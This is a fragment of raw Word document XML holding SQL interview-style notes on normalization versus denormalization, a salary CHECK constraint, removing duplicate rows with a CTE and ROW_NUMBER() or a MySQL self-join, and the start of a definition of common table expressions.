    <w:p w14:paraId="21FC3082" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45898" w:rsidP="00A45898">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 xml:space="preserve">Denormalization is a trade-off between performance and maintainability. It is used primarily when </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more important than </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is common in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reporting system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warehousing</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NoSQL databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. While it can reduce the complexity of queries and improve performance, it can lead to problems like </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>redundant data</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inconsistency</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increased storage requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Therefore, it should be used judiciously based on the application's needs and the nature of its data access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1806FF51" w14:textId="6893FFED"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D701">
          <v:rect id="_x0000_i3214" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A8F51D" w14:textId="2376D45F" w:rsidR="00591CC9" w:rsidRPr="00CE4B95" w:rsidRDefault="00591CC9" w:rsidP="00591CC9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="763" w:name="_Toc197867977"/>
      <w:r w:rsidRPr="00591CC9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Normalization and Denoramalization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="763"/>
    </w:p>
    <w:p w14:paraId="5ED8A2E1" w14:textId="76B62F20" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:jc w:val="both"/>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490"/>
        <w:gridCol w:w="4559"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="223055FE" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37ED8953"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EBA0B19"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Normalization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32487EAC"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Denormalization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="19EBD72C" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="335FAC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finition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7856FEE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organizing data to reduce redundancy and improve data integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C7CC7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combining tables to reduce joins and improve read performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="32D22570" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07AA69FC"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Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FB0A876"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Eliminate data redundancy and ensure data integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="273B8E63"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Improve query performance by reducing joins</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="7969BE78" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42F2F96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Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E55C0D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more tables with relationships (foreign keys)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AD43107"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fewer tables with more redundant data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="45958619" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68BCF522"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peed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3414F6CA"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lower read operations (due to joins), faster write/update</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="234C6A44"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Faster read operations, slower write/update due to redundancy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="3FCF9F72" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14464D4B"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 Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="680FF26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TP systems (e.g., banking, transactions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46D3A0E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AP systems (e.g., reporting, analytics)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="61CB3D3A" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B24ABB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Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68DD248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High (due to reduced duplication)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06CF826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ower (due to duplication and possible inconsistency)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CF8CBA9" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5265B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5265B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA9FA5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Normalize for write-heavy applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F4F328"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normalize for read-heavy applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398C4457" w14:textId="2214CE3C" w:rsidR="00591CC9" w:rsidRDefault="00E5265B" w:rsidP="00591CC9">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et me know if you want examples for each.</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3E2F1E44">
          <v:rect id="_x0000_i3215" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C492F" w14:textId="4C2E3D2B" w:rsidR="00666CEF" w:rsidRPr="00CE4B95" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="764" w:name="_Toc197867978"/>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SQL Query - Creating table with constraint to check employee salary is greater than 5000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="764"/>
    </w:p>
    <w:p w14:paraId="758321EB" w14:textId="28D0A0B5" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371BF8CA"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REATE TABLE employee (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4724357D"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id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5324DE57"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name VARCHAR(100),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487298F4"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salary DECIMAL(10, 2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F62B15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CONSTRAINT chk_salary CHECK (salary &gt; 5000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383940C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0775D4CE" w14:textId="77777777" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E718826"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hk_salary is the name of the constraint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7481052D"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salary &gt; 5000) ensures no row can be inserted or updated with salary ≤ 5000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D2A69" w14:textId="099A2404" w:rsidR="00666CEF"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96FFD">
          <v:rect id="_x0000_i3216" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F68C7A" w14:textId="6347119D" w:rsidR="003F368A" w:rsidRPr="00CE4B95" w:rsidRDefault="00D6157E" w:rsidP="003F368A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="765" w:name="_Toc197867979"/>
      <w:r w:rsidRPr="00D6157E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to remove duplicate records from table which does not have primary key</w:t>
      </w:r>
      <w:r w:rsidR="003F368A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="765"/>
    </w:p>
    <w:p w14:paraId="49E997DB" w14:textId="2184A5D0" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="003B27A1" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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To remove duplicate records from a table </w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>without a primary key or unique constraint</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CTE (Common Table Expression)</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with ROW_NUMBER() or DELETE with a subquery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21739742"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Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Method: Using CTE and ROW_NUMBER() (works in SQL Server, PostgreSQL, Oracle 12c+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E8BA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lastRenderedPageBreak/>
        <w:t>WITH CTE AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BF725D"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SELECT *, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32930937"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ROW_NUMBER() OVER (PARTITION BY column1, column2, column3 ORDER BY id) AS rn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD55BFF"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FROM your_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D371763"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1588EAF6"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FROM CTE WHERE rn &gt; 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAA97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eplace column1, column2, column3 with the columns that define duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E34531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OW_NUMBER() assigns a number to each duplicate group. We keep the first (rn = 1) and delete the rest (rn &gt; 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68643B72" w14:textId="77777777" w:rsidR="003B27A1" w:rsidRPr="003B27A1" w:rsidRDefault="00000000" w:rsidP="003B27A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7A5A0">
          <v:rect id="_x0000_i3217" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68497721"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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> For MySQL (before 8.0, without CTE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C0A5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t1 FROM your_table t1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD5DE9B"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JOIN your_table t2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C9DE3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ON t1.column1 = t2.column1 AND t1.column2 = t2.column2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625DB74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WHERE t1.id &gt; t2.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404CB81E"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Note: You must use a unique identifier (id or combination of row content) in the ORDER BY or WHERE condition to differentiate duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBA962F" w14:textId="539FE3D9" w:rsidR="003F368A"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A2CA7">
          <v:rect id="_x0000_i3218" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61556A94" w14:textId="6D7B68CA" w:rsidR="003F368A" w:rsidRPr="00CE4B95" w:rsidRDefault="00D6157E" w:rsidP="003F368A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="766" w:name="_Toc197867980"/>
      <w:r w:rsidRPr="00D6157E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Common Table Expression in SQL</w:t>
      </w:r>
      <w:r w:rsidR="003F368A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="766"/>
    </w:p>
    <w:p w14:paraId="203A6D82" w14:textId="7BD12E28" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Common Table Expression (CTE)</w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL is a temporary result set defined using the WITH clause that you can reference within a SELECT, INSERT, UPDATE, or DELETE statement.</w:t>
      </w:r>
    </w:p>
